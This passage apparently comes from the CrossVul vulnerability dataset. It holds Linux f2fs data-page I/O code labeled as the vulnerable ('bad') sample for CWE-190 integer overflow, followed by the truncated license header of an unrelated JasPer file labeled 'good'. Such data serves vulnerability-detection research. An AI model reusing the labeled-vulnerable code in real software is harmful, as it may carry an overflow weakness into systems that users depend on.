map->m_len += dn.ofs_in_node - ofs_in_node;
if (prealloc && dn.ofs_in_node != last_ofs_in_node + 1) {
err = -ENOSPC;
goto sync_out;
}
dn.ofs_in_node = end_offset;
}
if (pgofs >= end)
goto sync_out;
else if (dn.ofs_in_node < end_offset)
goto next_block;
f2fs_put_dnode(&dn);
if (create) {
f2fs_unlock_op(sbi);
f2fs_balance_fs(sbi, dn.node_changed);
}
goto next_dnode;
sync_out:
f2fs_put_dnode(&dn);
unlock_out:
if (create) {
f2fs_unlock_op(sbi);
f2fs_balance_fs(sbi, dn.node_changed);
}
out:
trace_f2fs_map_blocks(inode, map, err);
return err;
}
static int __get_data_block(struct inode *inode, sector_t iblock,
struct buffer_head *bh, int create, int flag,
pgoff_t *next_pgofs)
{
struct f2fs_map_blocks map;
int err;
map.m_lblk = iblock;
map.m_len = bh->b_size >> inode->i_blkbits;
map.m_next_pgofs = next_pgofs;
err = f2fs_map_blocks(inode, &map, create, flag);
if (!err) {
map_bh(bh, inode->i_sb, map.m_pblk);
bh->b_state = (bh->b_state & ~F2FS_MAP_FLAGS) | map.m_flags;
bh->b_size = map.m_len << inode->i_blkbits;
}
return err;
}
static int get_data_block(struct inode *inode, sector_t iblock,
struct buffer_head *bh_result, int create, int flag,
pgoff_t *next_pgofs)
{
return __get_data_block(inode, iblock, bh_result, create,
flag, next_pgofs);
}
static int get_data_block_dio(struct inode *inode, sector_t iblock,
struct buffer_head *bh_result, int create)
{
return __get_data_block(inode, iblock, bh_result, create,
F2FS_GET_BLOCK_DIO, NULL);
}
static int get_data_block_bmap(struct inode *inode, sector_t iblock,
struct buffer_head *bh_result, int create)
{
/* Block number less than F2FS MAX BLOCKS */
if (unlikely(iblock >= F2FS_I_SB(inode)->max_file_blocks))
return -EFBIG;
return __get_data_block(inode, iblock, bh_result, create,
F2FS_GET_BLOCK_BMAP, NULL);
}
static inline sector_t logical_to_blk(struct inode *inode, loff_t offset)
{
return (offset >> inode->i_blkbits);
}
static inline loff_t blk_to_logical(struct inode *inode, sector_t blk)
{
return (blk << inode->i_blkbits);
}
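/*
 * Illustrative sketch: these helpers convert between byte offsets and
 * block numbers using the inode's block size.  With the usual 4KiB
 * f2fs block (i_blkbits == 12), byte offset 8192 maps to block 2 and
 * back.  The check is hypothetical, assumes <assert.h>, and is kept
 * under "#if 0".
 */
#if 0
static void example_logical_blk_conversion(void)
{
	unsigned int blkbits = 12;	/* 4096-byte blocks */

	assert((8192ULL >> blkbits) == 2);	/* logical_to_blk */
	assert((2ULL << blkbits) == 8192);	/* blk_to_logical */
}
#endif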
int f2fs_fiemap(struct inode *inode, struct fiemap_extent_info *fieinfo,
u64 start, u64 len)
{
struct buffer_head map_bh;
sector_t start_blk, last_blk;
pgoff_t next_pgofs;
u64 logical = 0, phys = 0, size = 0;
u32 flags = 0;
int ret = 0;
ret = fiemap_check_flags(fieinfo, FIEMAP_FLAG_SYNC);
if (ret)
return ret;
if (f2fs_has_inline_data(inode)) {
ret = f2fs_inline_data_fiemap(inode, fieinfo, start, len);
if (ret != -EAGAIN)
return ret;
}
inode_lock(inode);
if (logical_to_blk(inode, len) == 0)
len = blk_to_logical(inode, 1);
start_blk = logical_to_blk(inode, start);
last_blk = logical_to_blk(inode, start + len - 1);
next:
memset(&map_bh, 0, sizeof(struct buffer_head));
map_bh.b_size = len;
ret = get_data_block(inode, start_blk, &map_bh, 0,
F2FS_GET_BLOCK_FIEMAP, &next_pgofs);
if (ret)
goto out;
/* HOLE */
if (!buffer_mapped(&map_bh)) {
start_blk = next_pgofs;
if (blk_to_logical(inode, start_blk) < blk_to_logical(inode,
F2FS_I_SB(inode)->max_file_blocks))
goto prep_next;
flags |= FIEMAP_EXTENT_LAST;
}
if (size) {
if (f2fs_encrypted_inode(inode))
flags |= FIEMAP_EXTENT_DATA_ENCRYPTED;
ret = fiemap_fill_next_extent(fieinfo, logical,
phys, size, flags);
}
if (start_blk > last_blk || ret)
goto out;
logical = blk_to_logical(inode, start_blk);
phys = blk_to_logical(inode, map_bh.b_blocknr);
size = map_bh.b_size;
flags = 0;
if (buffer_unwritten(&map_bh))
flags = FIEMAP_EXTENT_UNWRITTEN;
start_blk += logical_to_blk(inode, size);
prep_next:
cond_resched();
if (fatal_signal_pending(current))
ret = -EINTR;
else
goto next;
out:
if (ret == 1)
ret = 0;
inode_unlock(inode);
return ret;
}
static struct bio *f2fs_grab_bio(struct inode *inode, block_t blkaddr,
unsigned nr_pages)
{
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
struct fscrypt_ctx *ctx = NULL;
struct bio *bio;
if (f2fs_encrypted_inode(inode) && S_ISREG(inode->i_mode)) {
ctx = fscrypt_get_ctx(inode, GFP_NOFS);
if (IS_ERR(ctx))
return ERR_CAST(ctx);
/* wait for the page to be moved by cleaning */
f2fs_wait_on_encrypted_page_writeback(sbi, blkaddr);
}
bio = bio_alloc(GFP_KERNEL, min_t(int, nr_pages, BIO_MAX_PAGES));
if (!bio) {
if (ctx)
fscrypt_release_ctx(ctx);
return ERR_PTR(-ENOMEM);
}
f2fs_target_device(sbi, blkaddr, bio);
bio->bi_end_io = f2fs_read_end_io;
bio->bi_private = ctx;
return bio;
}
/*
* This function was originally taken from fs/mpage.c, and customized for f2fs.
 * The major change stems from block_size == page_size being the default in f2fs.
*/
static int f2fs_mpage_readpages(struct address_space *mapping,
struct list_head *pages, struct page *page,
unsigned nr_pages)
{
struct bio *bio = NULL;
unsigned page_idx;
sector_t last_block_in_bio = 0;
struct inode *inode = mapping->host;
const unsigned blkbits = inode->i_blkbits;
const unsigned blocksize = 1 << blkbits;
sector_t block_in_file;
sector_t last_block;
sector_t last_block_in_file;
sector_t block_nr;
struct f2fs_map_blocks map;
map.m_pblk = 0;
map.m_lblk = 0;
map.m_len = 0;
map.m_flags = 0;
map.m_next_pgofs = NULL;
for (page_idx = 0; nr_pages; page_idx++, nr_pages--) {
prefetchw(&page->flags);
if (pages) {
page = list_last_entry(pages, struct page, lru);
list_del(&page->lru);
if (add_to_page_cache_lru(page, mapping,
page->index,
readahead_gfp_mask(mapping)))
goto next_page;
}
block_in_file = (sector_t)page->index;
last_block = block_in_file + nr_pages;
last_block_in_file = (i_size_read(inode) + blocksize - 1) >>
blkbits;
if (last_block > last_block_in_file)
last_block = last_block_in_file;
/*
* Map blocks using the previous result first.
*/
if ((map.m_flags & F2FS_MAP_MAPPED) &&
block_in_file > map.m_lblk &&
block_in_file < (map.m_lblk + map.m_len))
goto got_it;
/*
* Then do more f2fs_map_blocks() calls until we are
* done with this page.
*/
map.m_flags = 0;
if (block_in_file < last_block) {
map.m_lblk = block_in_file;
map.m_len = last_block - block_in_file;
if (f2fs_map_blocks(inode, &map, 0,
F2FS_GET_BLOCK_READ))
goto set_error_page;
}
got_it:
if ((map.m_flags & F2FS_MAP_MAPPED)) {
block_nr = map.m_pblk + block_in_file - map.m_lblk;
SetPageMappedToDisk(page);
if (!PageUptodate(page) && !cleancache_get_page(page)) {
SetPageUptodate(page);
goto confused;
}
} else {
zero_user_segment(page, 0, PAGE_SIZE);
if (!PageUptodate(page))
SetPageUptodate(page);
unlock_page(page);
goto next_page;
}
/*
 * This page will go into a BIO. Do we need to send the
 * current BIO off first?
 */
if (bio && (last_block_in_bio != block_nr - 1 ||
!__same_bdev(F2FS_I_SB(inode), block_nr, bio))) {
submit_and_realloc:
__submit_bio(F2FS_I_SB(inode), bio, DATA);
bio = NULL;
}
if (bio == NULL) {
bio = f2fs_grab_bio(inode, block_nr, nr_pages);
if (IS_ERR(bio)) {
bio = NULL;
goto set_error_page;
}
bio_set_op_attrs(bio, REQ_OP_READ, 0);
}
if (bio_add_page(bio, page, blocksize, 0) < blocksize)
goto submit_and_realloc;
last_block_in_bio = block_nr;
goto next_page;
set_error_page:
SetPageError(page);
zero_user_segment(page, 0, PAGE_SIZE);
unlock_page(page);
goto next_page;
confused:
if (bio) {
__submit_bio(F2FS_I_SB(inode), bio, DATA);
bio = NULL;
}
unlock_page(page);
next_page:
if (pages)
put_page(page);
}
BUG_ON(pages && !list_empty(pages));
if (bio)
__submit_bio(F2FS_I_SB(inode), bio, DATA);
return 0;
}
static int f2fs_read_data_page(struct file *file, struct page *page)
{
struct inode *inode = page->mapping->host;
int ret = -EAGAIN;
trace_f2fs_readpage(page, DATA);
/* If the file has inline data, try to read it directly */
if (f2fs_has_inline_data(inode))
ret = f2fs_read_inline_data(inode, page);
if (ret == -EAGAIN)
ret = f2fs_mpage_readpages(page->mapping, NULL, page, 1);
return ret;
}
static int f2fs_read_data_pages(struct file *file,
struct address_space *mapping,
struct list_head *pages, unsigned nr_pages)
{
struct inode *inode = file->f_mapping->host;
struct page *page = list_last_entry(pages, struct page, lru);
trace_f2fs_readpages(inode, page, nr_pages);
/* If the file has inline data, skip readpages */
if (f2fs_has_inline_data(inode))
return 0;
return f2fs_mpage_readpages(mapping, pages, NULL, nr_pages);
}
int do_write_data_page(struct f2fs_io_info *fio)
{
struct page *page = fio->page;
struct inode *inode = page->mapping->host;
struct dnode_of_data dn;
int err = 0;
set_new_dnode(&dn, inode, NULL, NULL, 0);
err = get_dnode_of_data(&dn, page->index, LOOKUP_NODE);
if (err)
return err;
fio->old_blkaddr = dn.data_blkaddr;
/* This page is already truncated */
if (fio->old_blkaddr == NULL_ADDR) {
ClearPageUptodate(page);
goto out_writepage;
}
if (f2fs_encrypted_inode(inode) && S_ISREG(inode->i_mode)) {
gfp_t gfp_flags = GFP_NOFS;
/* wait for GCed encrypted page writeback */
f2fs_wait_on_encrypted_page_writeback(F2FS_I_SB(inode),
fio->old_blkaddr);
retry_encrypt:
fio->encrypted_page = fscrypt_encrypt_page(inode, fio->page,
PAGE_SIZE, 0,
fio->page->index,
gfp_flags);
if (IS_ERR(fio->encrypted_page)) {
err = PTR_ERR(fio->encrypted_page);
if (err == -ENOMEM) {
/* flush pending ios and wait for a while */
f2fs_flush_merged_bios(F2FS_I_SB(inode));
congestion_wait(BLK_RW_ASYNC, HZ/50);
gfp_flags |= __GFP_NOFAIL;
err = 0;
goto retry_encrypt;
}
goto out_writepage;
}
}
set_page_writeback(page);
/*
 * If the current allocation needs SSR,
 * in-place writes are preferred for updated data.
 */
if (unlikely(fio->old_blkaddr != NEW_ADDR &&
!is_cold_data(page) &&
!IS_ATOMIC_WRITTEN_PAGE(page) &&
need_inplace_update(inode))) {
rewrite_data_page(fio);
set_inode_flag(inode, FI_UPDATE_WRITE);
trace_f2fs_do_write_data_page(page, IPU);
} else {
write_data_page(&dn, fio);
trace_f2fs_do_write_data_page(page, OPU);
set_inode_flag(inode, FI_APPEND_WRITE);
if (page->index == 0)
set_inode_flag(inode, FI_FIRST_BLOCK_WRITTEN);
}
out_writepage:
f2fs_put_dnode(&dn);
return err;
}
static int f2fs_write_data_page(struct page *page,
struct writeback_control *wbc)
{
struct inode *inode = page->mapping->host;
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
loff_t i_size = i_size_read(inode);
const pgoff_t end_index = ((unsigned long long) i_size)
>> PAGE_SHIFT;
loff_t psize = (page->index + 1) << PAGE_SHIFT;
unsigned offset = 0;
bool need_balance_fs = false;
int err = 0;
struct f2fs_io_info fio = {
.sbi = sbi,
.type = DATA,
.op = REQ_OP_WRITE,
.op_flags = wbc_to_write_flags(wbc),
.page = page,
.encrypted_page = NULL,
};
trace_f2fs_writepage(page, DATA);
if (page->index < end_index)
goto write;
/*
* If the offset is out-of-range of file size,
* this page does not have to be written to disk.
*/
offset = i_size & (PAGE_SIZE - 1);
if ((page->index >= end_index + 1) || !offset)
goto out;
zero_user_segment(page, offset, PAGE_SIZE);
write:
if (unlikely(is_sbi_flag_set(sbi, SBI_POR_DOING)))
goto redirty_out;
if (f2fs_is_drop_cache(inode))
goto out;
/* we should not write the 0th page, which holds the journal header */
if (f2fs_is_volatile_file(inode) && (!page->index ||
(!wbc->for_reclaim &&
available_free_memory(sbi, BASE_CHECK))))
goto redirty_out;
/* we should bypass data pages so that the kworker jobs can proceed */
if (unlikely(f2fs_cp_error(sbi))) {
mapping_set_error(page->mapping, -EIO);
goto out;
}
/* Dentry blocks are controlled by checkpoint */
if (S_ISDIR(inode->i_mode)) {
err = do_write_data_page(&fio);
goto done;
}
if (!wbc->for_reclaim)
need_balance_fs = true;
else if (has_not_enough_free_secs(sbi, 0, 0))
goto redirty_out;
err = -EAGAIN;
f2fs_lock_op(sbi);
if (f2fs_has_inline_data(inode))
err = f2fs_write_inline_data(inode, page);
if (err == -EAGAIN)
err = do_write_data_page(&fio);
if (F2FS_I(inode)->last_disk_size < psize)
F2FS_I(inode)->last_disk_size = psize;
f2fs_unlock_op(sbi);
done:
if (err && err != -ENOENT)
goto redirty_out;
out:
inode_dec_dirty_pages(inode);
if (err)
ClearPageUptodate(page);
if (wbc->for_reclaim) {
f2fs_submit_merged_bio_cond(sbi, NULL, page, 0, DATA, WRITE);
remove_dirty_inode(inode);
}
unlock_page(page);
f2fs_balance_fs(sbi, need_balance_fs);
if (unlikely(f2fs_cp_error(sbi)))
f2fs_submit_merged_bio(sbi, DATA, WRITE);
return 0;
redirty_out:
redirty_page_for_writepage(wbc, page);
if (!err)
return AOP_WRITEPAGE_ACTIVATE;
unlock_page(page);
return err;
}
/*
 * This function was copied from write_cache_pages in mm/page-writeback.c.
 * The major change is performing the write step for cold data pages
 * separately from warm/hot data pages.
 */
static int f2fs_write_cache_pages(struct address_space *mapping,
struct writeback_control *wbc)
{
int ret = 0;
int done = 0;
struct pagevec pvec;
int nr_pages;
pgoff_t uninitialized_var(writeback_index);
pgoff_t index;
pgoff_t end; /* Inclusive */
pgoff_t done_index;
int cycled;
int range_whole = 0;
int tag;
int nwritten = 0;
pagevec_init(&pvec, 0);
if (wbc->range_cyclic) {
writeback_index = mapping->writeback_index; /* prev offset */
index = writeback_index;
if (index == 0)
cycled = 1;
else
cycled = 0;
end = -1;
} else {
index = wbc->range_start >> PAGE_SHIFT;
end = wbc->range_end >> PAGE_SHIFT;
if (wbc->range_start == 0 && wbc->range_end == LLONG_MAX)
range_whole = 1;
cycled = 1; /* ignore range_cyclic tests */
}
if (wbc->sync_mode == WB_SYNC_ALL || wbc->tagged_writepages)
tag = PAGECACHE_TAG_TOWRITE;
else
tag = PAGECACHE_TAG_DIRTY;
retry:
if (wbc->sync_mode == WB_SYNC_ALL || wbc->tagged_writepages)
tag_pages_for_writeback(mapping, index, end);
done_index = index;
while (!done && (index <= end)) {
int i;
nr_pages = pagevec_lookup_tag(&pvec, mapping, &index, tag,
min(end - index, (pgoff_t)PAGEVEC_SIZE - 1) + 1);
if (nr_pages == 0)
break;
for (i = 0; i < nr_pages; i++) {
struct page *page = pvec.pages[i];
if (page->index > end) {
done = 1;
break;
}
done_index = page->index;
lock_page(page);
if (unlikely(page->mapping != mapping)) {
continue_unlock:
unlock_page(page);
continue;
}
if (!PageDirty(page)) {
/* someone wrote it for us */
goto continue_unlock;
}
if (PageWriteback(page)) {
if (wbc->sync_mode != WB_SYNC_NONE)
f2fs_wait_on_page_writeback(page,
DATA, true);
else
goto continue_unlock;
}
BUG_ON(PageWriteback(page));
if (!clear_page_dirty_for_io(page))
goto continue_unlock;
ret = mapping->a_ops->writepage(page, wbc);
if (unlikely(ret)) {
/*
* keep nr_to_write, since vfs uses this to
* get # of written pages.
*/
if (ret == AOP_WRITEPAGE_ACTIVATE) {
unlock_page(page);
ret = 0;
continue;
}
done_index = page->index + 1;
done = 1;
break;
} else {
nwritten++;
}
if (--wbc->nr_to_write <= 0 &&
wbc->sync_mode == WB_SYNC_NONE) {
done = 1;
break;
}
}
pagevec_release(&pvec);
cond_resched();
}
if (!cycled && !done) {
cycled = 1;
index = 0;
end = writeback_index - 1;
goto retry;
}
if (wbc->range_cyclic || (range_whole && wbc->nr_to_write > 0))
mapping->writeback_index = done_index;
if (nwritten)
f2fs_submit_merged_bio_cond(F2FS_M_SB(mapping), mapping->host,
NULL, 0, DATA, WRITE);
return ret;
}
static int f2fs_write_data_pages(struct address_space *mapping,
struct writeback_control *wbc)
{
struct inode *inode = mapping->host;
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
struct blk_plug plug;
int ret;
/* deal with chardevs and other special files */
if (!mapping->a_ops->writepage)
return 0;
/* skip writing if there is no dirty page in this inode */
if (!get_dirty_pages(inode) && wbc->sync_mode == WB_SYNC_NONE)
return 0;
if (S_ISDIR(inode->i_mode) && wbc->sync_mode == WB_SYNC_NONE &&
get_dirty_pages(inode) < nr_pages_to_skip(sbi, DATA) &&
available_free_memory(sbi, DIRTY_DENTS))
goto skip_write;
/* skip writing during file defragment */
if (is_inode_flag_set(inode, FI_DO_DEFRAG))
goto skip_write;
/* during POR, we don't need to trigger writepage at all. */
if (unlikely(is_sbi_flag_set(sbi, SBI_POR_DOING)))
goto skip_write;
trace_f2fs_writepages(mapping->host, wbc, DATA);
blk_start_plug(&plug);
ret = f2fs_write_cache_pages(mapping, wbc);
blk_finish_plug(&plug);
/*
 * If some pages were truncated, we cannot rely on mapping->host
 * to detect pending bios.
 */
remove_dirty_inode(inode);
return ret;
skip_write:
wbc->pages_skipped += get_dirty_pages(inode);
trace_f2fs_writepages(mapping->host, wbc, DATA);
return 0;
}
static void f2fs_write_failed(struct address_space *mapping, loff_t to)
{
struct inode *inode = mapping->host;
loff_t i_size = i_size_read(inode);
if (to > i_size) {
truncate_pagecache(inode, i_size);
truncate_blocks(inode, i_size, true);
}
}
static int prepare_write_begin(struct f2fs_sb_info *sbi,
struct page *page, loff_t pos, unsigned len,
block_t *blk_addr, bool *node_changed)
{
struct inode *inode = page->mapping->host;
pgoff_t index = page->index;
struct dnode_of_data dn;
struct page *ipage;
bool locked = false;
struct extent_info ei;
int err = 0;
/*
* we already allocated all the blocks, so we don't need to get
* the block addresses when there is no need to fill the page.
*/
if (!f2fs_has_inline_data(inode) && len == PAGE_SIZE &&
!is_inode_flag_set(inode, FI_NO_PREALLOC))
return 0;
if (f2fs_has_inline_data(inode) ||
(pos & PAGE_MASK) >= i_size_read(inode)) {
f2fs_lock_op(sbi);
locked = true;
}
restart:
/* check inline_data */
ipage = get_node_page(sbi, inode->i_ino);
if (IS_ERR(ipage)) {
err = PTR_ERR(ipage);
goto unlock_out;
}
set_new_dnode(&dn, inode, ipage, ipage, 0);
if (f2fs_has_inline_data(inode)) {
if (pos + len <= MAX_INLINE_DATA) {
read_inline_data(page, ipage);
set_inode_flag(inode, FI_DATA_EXIST);
if (inode->i_nlink)
set_inline_node(ipage);
} else {
err = f2fs_convert_inline_page(&dn, page);
if (err)
goto out;
if (dn.data_blkaddr == NULL_ADDR)
err = f2fs_get_block(&dn, index);
}
} else if (locked) {
err = f2fs_get_block(&dn, index);
} else {
if (f2fs_lookup_extent_cache(inode, index, &ei)) {
dn.data_blkaddr = ei.blk + index - ei.fofs;
} else {
/* hole case */
err = get_dnode_of_data(&dn, index, LOOKUP_NODE);
if (err || dn.data_blkaddr == NULL_ADDR) {
f2fs_put_dnode(&dn);
f2fs_lock_op(sbi);
locked = true;
goto restart;
}
}
}
/* convert_inline_page can make node_changed */
*blk_addr = dn.data_blkaddr;
*node_changed = dn.node_changed;
out:
f2fs_put_dnode(&dn);
unlock_out:
if (locked)
f2fs_unlock_op(sbi);
return err;
}
static int f2fs_write_begin(struct file *file, struct address_space *mapping,
loff_t pos, unsigned len, unsigned flags,
struct page **pagep, void **fsdata)
{
struct inode *inode = mapping->host;
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
struct page *page = NULL;
pgoff_t index = ((unsigned long long) pos) >> PAGE_SHIFT;
bool need_balance = false;
block_t blkaddr = NULL_ADDR;
int err = 0;
trace_f2fs_write_begin(inode, pos, len, flags);
/*
* We should check this at this moment to avoid deadlock on inode page
* and #0 page. The locking rule for inline_data conversion should be:
* lock_page(page #0) -> lock_page(inode_page)
*/
if (index != 0) {
err = f2fs_convert_inline_inode(inode);
if (err)
goto fail;
}
repeat:
page = grab_cache_page_write_begin(mapping, index, flags);
if (!page) {
err = -ENOMEM;
goto fail;
}
*pagep = page;
err = prepare_write_begin(sbi, page, pos, len,
&blkaddr, &need_balance);
if (err)
goto fail;
if (need_balance && has_not_enough_free_secs(sbi, 0, 0)) {
unlock_page(page);
f2fs_balance_fs(sbi, true);
lock_page(page);
if (page->mapping != mapping) {
/* The page got truncated from under us */
f2fs_put_page(page, 1);
goto repeat;
}
}
f2fs_wait_on_page_writeback(page, DATA, false);
/* wait for GCed encrypted page writeback */
if (f2fs_encrypted_inode(inode) && S_ISREG(inode->i_mode))
f2fs_wait_on_encrypted_page_writeback(sbi, blkaddr);
if (len == PAGE_SIZE || PageUptodate(page))
return 0;
if (!(pos & (PAGE_SIZE - 1)) && (pos + len) >= i_size_read(inode)) {
zero_user_segment(page, len, PAGE_SIZE);
return 0;
}
if (blkaddr == NEW_ADDR) {
zero_user_segment(page, 0, PAGE_SIZE);
SetPageUptodate(page);
} else {
struct bio *bio;
bio = f2fs_grab_bio(inode, blkaddr, 1);
if (IS_ERR(bio)) {
err = PTR_ERR(bio);
goto fail;
}
bio->bi_opf = REQ_OP_READ;
if (bio_add_page(bio, page, PAGE_SIZE, 0) < PAGE_SIZE) {
bio_put(bio);
err = -EFAULT;
goto fail;
}
__submit_bio(sbi, bio, DATA);
lock_page(page);
if (unlikely(page->mapping != mapping)) {
f2fs_put_page(page, 1);
goto repeat;
}
if (unlikely(!PageUptodate(page))) {
err = -EIO;
goto fail;
}
}
return 0;
fail:
f2fs_put_page(page, 1);
f2fs_write_failed(mapping, pos + len);
return err;
}
static int f2fs_write_end(struct file *file,
struct address_space *mapping,
loff_t pos, unsigned len, unsigned copied,
struct page *page, void *fsdata)
{
struct inode *inode = page->mapping->host;
trace_f2fs_write_end(inode, pos, len, copied);
	/*
	 * This should come from len == PAGE_SIZE, and we expect copied to be
	 * PAGE_SIZE as well. Otherwise, treat the copy as failed (copied = 0)
	 * and let generic_perform_write() retry the copy.
	 */
if (!PageUptodate(page)) {
if (unlikely(copied != len))
copied = 0;
else
SetPageUptodate(page);
}
if (!copied)
goto unlock_out;
set_page_dirty(page);
if (pos + copied > i_size_read(inode))
f2fs_i_size_write(inode, pos + copied);
unlock_out:
f2fs_put_page(page, 1);
f2fs_update_time(F2FS_I_SB(inode), REQ_TIME);
return copied;
}
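/*
 * Direct I/O is permitted only when the file offset and the user buffer are
 * both aligned to the filesystem block size.
 */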
static int check_direct_IO(struct inode *inode, struct iov_iter *iter,
loff_t offset)
{
unsigned blocksize_mask = inode->i_sb->s_blocksize - 1;
if (offset & blocksize_mask)
return -EINVAL;
if (iov_iter_alignment(iter) & blocksize_mask)
return -EINVAL;
return 0;
}
static ssize_t f2fs_direct_IO(struct kiocb *iocb, struct iov_iter *iter)
{
struct address_space *mapping = iocb->ki_filp->f_mapping;
struct inode *inode = mapping->host;
size_t count = iov_iter_count(iter);
loff_t offset = iocb->ki_pos;
int rw = iov_iter_rw(iter);
int err;
err = check_direct_IO(inode, iter, offset);
if (err)
return err;
if (__force_buffered_io(inode, rw))
return 0;
trace_f2fs_direct_IO_enter(inode, offset, count, rw);
down_read(&F2FS_I(inode)->dio_rwsem[rw]);
err = blockdev_direct_IO(iocb, inode, iter, get_data_block_dio);
up_read(&F2FS_I(inode)->dio_rwsem[rw]);
if (rw == WRITE) {
if (err > 0)
set_inode_flag(inode, FI_UPDATE_WRITE);
else if (err < 0)
f2fs_write_failed(mapping, offset + count);
}
trace_f2fs_direct_IO_exit(inode, offset, count, rw, err);
return err;
}
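/*
 * ->invalidatepage(): a page is being removed from the page cache. Drop the
 * per-type dirty-page accounting and clear the page's private state, unless
 * the page belongs to an in-flight atomic write.
 */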
void f2fs_invalidate_page(struct page *page, unsigned int offset,
unsigned int length)
{
struct inode *inode = page->mapping->host;
struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
if (inode->i_ino >= F2FS_ROOT_INO(sbi) &&
(offset % PAGE_SIZE || length != PAGE_SIZE))
return;
if (PageDirty(page)) {
if (inode->i_ino == F2FS_META_INO(sbi)) {
dec_page_count(sbi, F2FS_DIRTY_META);
} else if (inode->i_ino == F2FS_NODE_INO(sbi)) {
dec_page_count(sbi, F2FS_DIRTY_NODES);
} else {
inode_dec_dirty_pages(inode);
remove_dirty_inode(inode);
}
}
/* This is atomic written page, keep Private */
if (IS_ATOMIC_WRITTEN_PAGE(page))
return;
set_page_private(page, 0);
ClearPagePrivate(page);
}
int f2fs_release_page(struct page *page, gfp_t wait)
{
/* If this is dirty page, keep PagePrivate */
if (PageDirty(page))
return 0;
/* This is atomic written page, keep Private */
if (IS_ATOMIC_WRITTEN_PAGE(page))
return 0;
set_page_private(page, 0);
ClearPagePrivate(page);
return 1;
}
/*
 * This was copied from __set_page_dirty_buffers, which gives higher
 * performance on very high-speed storage (e.g., pmem).
 */
void f2fs_set_page_dirty_nobuffers(struct page *page)
{
struct address_space *mapping = page->mapping;
unsigned long flags;
if (unlikely(!mapping))
return;
spin_lock(&mapping->private_lock);
lock_page_memcg(page);
SetPageDirty(page);
spin_unlock(&mapping->private_lock);
spin_lock_irqsave(&mapping->tree_lock, flags);
WARN_ON_ONCE(!PageUptodate(page));
account_page_dirtied(page, mapping);
radix_tree_tag_set(&mapping->page_tree,
page_index(page), PAGECACHE_TAG_DIRTY);
spin_unlock_irqrestore(&mapping->tree_lock, flags);
unlock_page_memcg(page);
__mark_inode_dirty(mapping->host, I_DIRTY_PAGES);
return;
}
static int f2fs_set_data_page_dirty(struct page *page)
{
struct address_space *mapping = page->mapping;
struct inode *inode = mapping->host;
trace_f2fs_set_page_dirty(page, DATA);
if (!PageUptodate(page))
SetPageUptodate(page);
if (f2fs_is_atomic_file(inode) && !f2fs_is_commit_atomic_write(inode)) {
if (!IS_ATOMIC_WRITTEN_PAGE(page)) {
register_inmem_page(inode, page);
return 1;
}
/*
* Previously, this page has been registered, we just
* return here.
*/
return 0;
}
if (!PageDirty(page)) {
f2fs_set_page_dirty_nobuffers(page);
update_dirty_page(inode, page);
return 1;
}
return 0;
}
static sector_t f2fs_bmap(struct address_space *mapping, sector_t block)
{
struct inode *inode = mapping->host;
if (f2fs_has_inline_data(inode))
return 0;
/* make sure allocating whole blocks */
if (mapping_tagged(mapping, PAGECACHE_TAG_DIRTY))
filemap_write_and_wait(mapping);
return generic_block_bmap(mapping, block, get_data_block_bmap);
}
#ifdef CONFIG_MIGRATION
#include <linux/migrate.h>
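/*
 * ->migratepage() hook: move an f2fs data page to a new page frame. Pages
 * registered for an atomic write are handled under fi->inmem_lock so the
 * in-memory page list is updated to point at the new page.
 */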
int f2fs_migrate_page(struct address_space *mapping,
struct page *newpage, struct page *page, enum migrate_mode mode)
{
int rc, extra_count;
struct f2fs_inode_info *fi = F2FS_I(mapping->host);
bool atomic_written = IS_ATOMIC_WRITTEN_PAGE(page);
BUG_ON(PageWriteback(page));
/* migrating an atomic written page is safe with the inmem_lock hold */
if (atomic_written && !mutex_trylock(&fi->inmem_lock))
return -EAGAIN;
	/*
	 * An extra reference is expected if PagePrivate is set when moving the
	 * mapping; however, F2FS breaks this rule in order to maintain its
	 * dirty page counts when truncating pages. Adjusting 'extra_count'
	 * here makes the migration accounting work.
	 */
extra_count = (atomic_written ? 1 : 0) - page_has_private(page);
rc = migrate_page_move_mapping(mapping, newpage,
page, NULL, mode, extra_count);
if (rc != MIGRATEPAGE_SUCCESS) {
if (atomic_written)
mutex_unlock(&fi->inmem_lock);
return rc;
}
if (atomic_written) {
struct inmem_pages *cur;
list_for_each_entry(cur, &fi->inmem_pages, list)
if (cur->page == page) {
cur->page = newpage;
break;
}
mutex_unlock(&fi->inmem_lock);
put_page(page);
get_page(newpage);
}
if (PagePrivate(page))
SetPagePrivate(newpage);
set_page_private(newpage, page_private(page));
migrate_page_copy(newpage, page);
return MIGRATEPAGE_SUCCESS;
}
#endif
const struct address_space_operations f2fs_dblock_aops = {
.readpage = f2fs_read_data_page,
.readpages = f2fs_read_data_pages,
.writepage = f2fs_write_data_page,
.writepages = f2fs_write_data_pages,
.write_begin = f2fs_write_begin,
.write_end = f2fs_write_end,
.set_page_dirty = f2fs_set_data_page_dirty,
.invalidatepage = f2fs_invalidate_page,
.releasepage = f2fs_release_page,
.direct_IO = f2fs_direct_IO,
.bmap = f2fs_bmap,
#ifdef CONFIG_MIGRATION
.migratepage = f2fs_migrate_page,
#endif
};
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_3028_0
crossvul-cpp_data_good_5412_0 |
/*
* Copyright (c) 1999-2000 Image Power, Inc. and the University of
* British Columbia.
* Copyright (c) 2001-2003 Michael David Adams.
* All rights reserved.
*/
/* __START_OF_JASPER_LICENSE__
*
* JasPer License Version 2.0
*
* Copyright (c) 2001-2006 Michael David Adams
* Copyright (c) 1999-2000 Image Power, Inc.
* Copyright (c) 1999-2000 The University of British Columbia
*
* All rights reserved.
*
* Permission is hereby granted, free of charge, to any person (the
* "User") obtaining a copy of this software and associated documentation
* files (the "Software"), to deal in the Software without restriction,
* including without limitation the rights to use, copy, modify, merge,
* publish, distribute, and/or sell copies of the Software, and to permit
* persons to whom the Software is furnished to do so, subject to the
* following conditions:
*
* 1. The above copyright notices and this permission notice (which
* includes the disclaimer below) shall be included in all copies or
* substantial portions of the Software.
*
* 2. The name of a copyright holder shall not be used to endorse or
* promote products derived from the Software without specific prior
* written permission.
*
* THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS
* LICENSE. NO USE OF THE SOFTWARE IS AUTHORIZED HEREUNDER EXCEPT UNDER
* THIS DISCLAIMER. THE SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS
